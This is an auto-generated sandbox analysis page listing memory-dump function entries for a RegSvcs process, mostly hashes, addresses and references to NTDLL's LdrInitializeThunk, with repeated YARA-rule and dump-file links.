Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7aebf4c940c22565cc29f1d272763d2f8e796c9bfefeda14350d28faae302146
Instruction ID: d9fdf5ad7e9440e9388ffef92a35ea2c03a56d9344a9d17c3742ebba62664d25
Opcode Fuzzy Hash: 7aebf4c940c22565cc29f1d272763d2f8e796c9bfefeda14350d28faae302146
Instruction Fuzzy Hash: 5D90026120240003410971584554616900B97E0301B95C021E1015594DC62589916625

Function 01172C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0118FD4F,000000FF,00000024,01226634,00000004,00000000,?,-00000018,7D810F61,?,?,01148B12,?,?,?,?), ref: 01172C24

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 602256cd8125a1c08e55479d784888a33d626a111dbe9dd60da4e5cb77bd214d
Instruction ID: 69b80a47a956ff265647d40ed8c76c50f6b2576196c2c32d41ba07d2277e0a37
Opcode Fuzzy Hash: 602256cd8125a1c08e55479d784888a33d626a111dbe9dd60da4e5cb77bd214d
Instruction Fuzzy Hash: C7B09B719015C5C5DA15F7644708717791577D0701F65C061D3030655F4738C1D1E675

Function 01172BF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01187BA5,000000FF,?,00000000,?,00001000,00000000,?,-00000018,7D810F61,?,?,?,?), ref: 01172BFA

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 480ac293842bae334a12141efe97b6ca81ce1630a902b2a7fd95ec75391f361d
Instruction ID: 6428593f97802b8bb8125b98b647c3a8735c11328a6ea2e7581b74e1d04d451e
Opcode Fuzzy Hash: 480ac293842bae334a12141efe97b6ca81ce1630a902b2a7fd95ec75391f361d
Instruction Fuzzy Hash: E390023120140802D1847158454464A500697D1301FD5C015A0026658DCB158B597BA1

Function 01172AD0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011A9864,?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,0117034A,?,?,?,00000003), ref: 01172ADA

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 596d1799a031d23fa18233ce064a9d8eb4b19b6b775f6027f51c11a09fd16ec9
Instruction ID: 1d38bf88e6b2c2828903d286edf1aab690428006e58e1e3494d89d8954cfa286
Opcode Fuzzy Hash: 596d1799a031d23fa18233ce064a9d8eb4b19b6b775f6027f51c11a09fd16ec9
Instruction Fuzzy Hash: 7C90043531140003010DF55C07445075047D7D53513D5C031F1017554CD731CD715731

Function 01172D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011BB508,00000004,000000FF,0000001E,00000000,00000000,00000000,C0000409,00000001,00000000,00000004,00000004,000F0007,C0000001,?,00000004), ref: 01172D1A

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 394fb2b6caacd44ca1609a89b8d9e3637e8f70f6bcd488c344fd25d490ea53c6
Instruction ID: 50180f8f95c5c37cac25062479f5d798719ce10a531ba51f7d52da76f1fc0b05
Opcode Fuzzy Hash: 394fb2b6caacd44ca1609a89b8d9e3637e8f70f6bcd488c344fd25d490ea53c6
Instruction Fuzzy Hash: 0A90022921340002D1847158554860A500697D1302FD5D415A001655CCCA1589695721

Function 01172D30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0115A52A,000000FF,?,012267F8,0120C9A0,00000020,0115A460,0122689C,00000000,0000001D,?,00BD2D38), ref: 01172D3A

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f8a1c6045f7d92ffc009a3228dbbbdad391719206809cade9f9a4677f3de5be
Instruction ID: 8f8618a68a7141fe33616817f9e9fa1a0d4b614b6e7680fd225ae8491c91e46c
Opcode Fuzzy Hash: 5f8a1c6045f7d92ffc009a3228dbbbdad391719206809cade9f9a4677f3de5be
Instruction Fuzzy Hash: AD90022130140003D144715855586069006E7E1301F95D011E0415558CDA1589565722

Function 01172DD0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011891A3,00000000,00000000,?,?,?,01138A1A,0120C2B0,00000018,01128873), ref: 01172DDA

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e06a66ac6d1376fa4d936cfa92bb3fe409eee3e30efd605c82f4adcd7605b934
Instruction ID: 8abe14b3e1cad6d8252692d0dcf5341ba5d067a748952e743550ac9a3b9d9aee
Opcode Fuzzy Hash: e06a66ac6d1376fa4d936cfa92bb3fe409eee3e30efd605c82f4adcd7605b934
Instruction Fuzzy Hash: 89900221242441525549B15845445079007A7E03417D5C012A1415954CC6269956DB21

Function 01172DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011AE73E,0000005A,0120D040,00000020,00000000,0120D040,00000080,01194A81,00000000,?,?,00000002,00000000,?,?,0117AE00), ref: 01172DFA

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d4061570efd80a3cc4aa4f15102cf8b13808ac85b3651ffa0608c380bcd5e67
Instruction ID: 63756e7fd5da4fd36a3f1182157030af8d747adf4f309803bfa934bb0df512fc
Opcode Fuzzy Hash: 4d4061570efd80a3cc4aa4f15102cf8b13808ac85b3651ffa0608c380bcd5e67
Instruction Fuzzy Hash: B390023120140413D11571584644707500A97D0341FD5C412A042555CDD7568A52A621

Function 01172C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0112FB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,01187BE5,00001000,00004000,000000FF,?,00000000), ref: 01172C7A

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36ba8ce39f5fc548fe1fc40b651a6753097e36345136d29a8f0e095ec267921d
Instruction ID: 12584dcfc6e0ebf2ec5221abe288403f392952b7b3806c6cd67449f86981811b
Opcode Fuzzy Hash: 36ba8ce39f5fc548fe1fc40b651a6753097e36345136d29a8f0e095ec267921d
Instruction Fuzzy Hash: C790023120148802D1147158854474A500697D0301F99C411A442565CDC79589917621

Function 01172CA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01153999,000000FA,00000001,?,00000050,?,?), ref: 01172CAA

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 72dbd784387ffeaeb48b3156524ba5bbc7b35b2666c4c145c5fe7f2079eec89a
Instruction ID: c8bcec817359b6293fa19f8caee4a2818f6c6a0599822bf05111acfa94933805
Opcode Fuzzy Hash: 72dbd784387ffeaeb48b3156524ba5bbc7b35b2666c4c145c5fe7f2079eec89a
Instruction Fuzzy Hash: B590023120140402D10475985548646500697E0301F95D011A5025559EC76589916631

Function 01172F30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011BB4E6,00000004,000F0007,C0000001,?,00000004,08000000,00000000,00000000,00000000,00000000,00000058), ref: 01172F3A

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45fee63a76d4e5d5f9ff91ac9be2a864c453a38783482c04a334e4e5bac5d477
Instruction ID: d1bcba5efe8dedd85418fc2c252c34d9c43152948ab9405c1c67ce1ac384cf5a
Opcode Fuzzy Hash: 45fee63a76d4e5d5f9ff91ac9be2a864c453a38783482c04a334e4e5bac5d477
Instruction Fuzzy Hash: BA90026134140442D10471584554B065006D7E1301F95C015E1065558DC719CD526626

Function 01172F90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011ACF47,000000FF,?,?,00000000,?,00000000,?,?), ref: 01172F9A

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1729eb43222bb4982f875517c84db59a727b14a9906fd47c1f009e52e3eadda8
Instruction ID: a40a3267b60b1a58ad63680cc1c30050efc29b1e34be1d3dbcc701faa65c1c38
Opcode Fuzzy Hash: 1729eb43222bb4982f875517c84db59a727b14a9906fd47c1f009e52e3eadda8
Instruction Fuzzy Hash: 0A90023120180402D1047158495470B500697D0302F95C011A1165559DC72589516A71

Function 01172FB0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011705E3,00000000,00000000,00000001,00000000,00000000,00000000,?,01172380,011703B6,00000000,00000000,?,00000000,?), ref: 01172FBA

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cbfa8e448ed1351b5588617a7f96ac2f36f9ae90b5832906ad653436c653c607
Instruction ID: 687eff24938e1562552ef81caaa8ed81ef6db6a4e727e1ff1d9b63c1e599b71f
Opcode Fuzzy Hash: cbfa8e448ed1351b5588617a7f96ac2f36f9ae90b5832906ad653436c653c607
Instruction Fuzzy Hash: 7D900221601400424144716889849069006BBE1311795C121A0999554DC65989655B65

Function 01172FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(011717E5,00000001,C0100080,00000018,?,00000000,00000080,00000005,000000FE,00000068,00000000,00000000,?,00000000,00000000,?), ref: 01172FEA

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37982a9fd20ae29cd365c4066e963cf51579f2cb06cbdf78972aedc18a408038
Instruction ID: 4d46d3d6655e6e25e66a92dcae825606d9235dad7a5eec49e8ecf0bb3242ec6a
Opcode Fuzzy Hash: 37982a9fd20ae29cd365c4066e963cf51579f2cb06cbdf78972aedc18a408038
Instruction Fuzzy Hash: 6F900221211C0042D20475684D54B07500697D0303F95C115A0155558CCA1589615A21

Function 01172E80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011B809B,?,?,?,?,?), ref: 01172E8A

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cd01ef1a852e65641989298e640d81be187af9e57d08efd6a48d146e7f241465
Instruction ID: e66f376f479d26c56706799206930658035a597e447506a938000973e9e3c4dd
Opcode Fuzzy Hash: cd01ef1a852e65641989298e640d81be187af9e57d08efd6a48d146e7f241465
Instruction Fuzzy Hash: DD90022160140502D10571584544616500B97D0341FD5C022A1025559ECB258A92A631

Function 01172EA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01191B8A,?,00000000,00000001,00000010,00000000,00000000,000000FE,00000005,?,00000004,?,00000004,?,00000002,?), ref: 01172EAA

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c105367a5d3d70a0ef6eed86a78d820ca919336b55d3d9b7166564589a4027e3
Instruction ID: b54223aa7a00700434adbf323c33a3d5e111c4c7ca126ebba89fd18e75632901
Opcode Fuzzy Hash: c105367a5d3d70a0ef6eed86a78d820ca919336b55d3d9b7166564589a4027e3
Instruction Fuzzy Hash: BD90027120140402D14471584544746500697D0301F95C011A5065558EC7598ED56B65

Function 0041F087 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2209270982.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_41f000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87a3725e45c8c7c233bfac616dcfec35007871f626b5a3bf92c04963f6edacc2
Instruction ID: dcd5ac8cac8e802575590a237b0b6bfb525a419421a356959f042b96bf7ddb8a
Opcode Fuzzy Hash: 87a3725e45c8c7c233bfac616dcfec35007871f626b5a3bf92c04963f6edacc2
Instruction Fuzzy Hash: 0FB0127585560D1B4020B4BF69431E3F78DEA2DB29B90839BEEED072E76A07986204D7

Function 0041F090 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2209270982.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_41f000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f3df612203db1050245de8556794609f8a22a924f0f1424fbda9286918147f4
Instruction ID: f2c7134f0b61fba07eff6af8d4d3421aea6d06c4f158b09af25d4f6764a13b1f
Opcode Fuzzy Hash: 2f3df612203db1050245de8556794609f8a22a924f0f1424fbda9286918147f4
Instruction Fuzzy Hash: 62A022A0C8A30C03002030FA2A03023F30CC000008F0003EAEECC022023C03A83200EB

Non-executed Functions

Function 011B4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011B4809

Strings

LdrpCheckRedirection, xrefs: 011B488F
minkernel\ntdll\ldrredirect.c, xrefs: 011B4899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011B4888

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: f1f46893c28ed854b071460f2b5496daf9840f8ad9c5c3d66b5241d1b70d033c
Instruction ID: 44f3cf6cbb36727a3c89812f590e470212df1f73623831d598f817ed544a0c4c
Opcode Fuzzy Hash: f1f46893c28ed854b071460f2b5496daf9840f8ad9c5c3d66b5241d1b70d033c
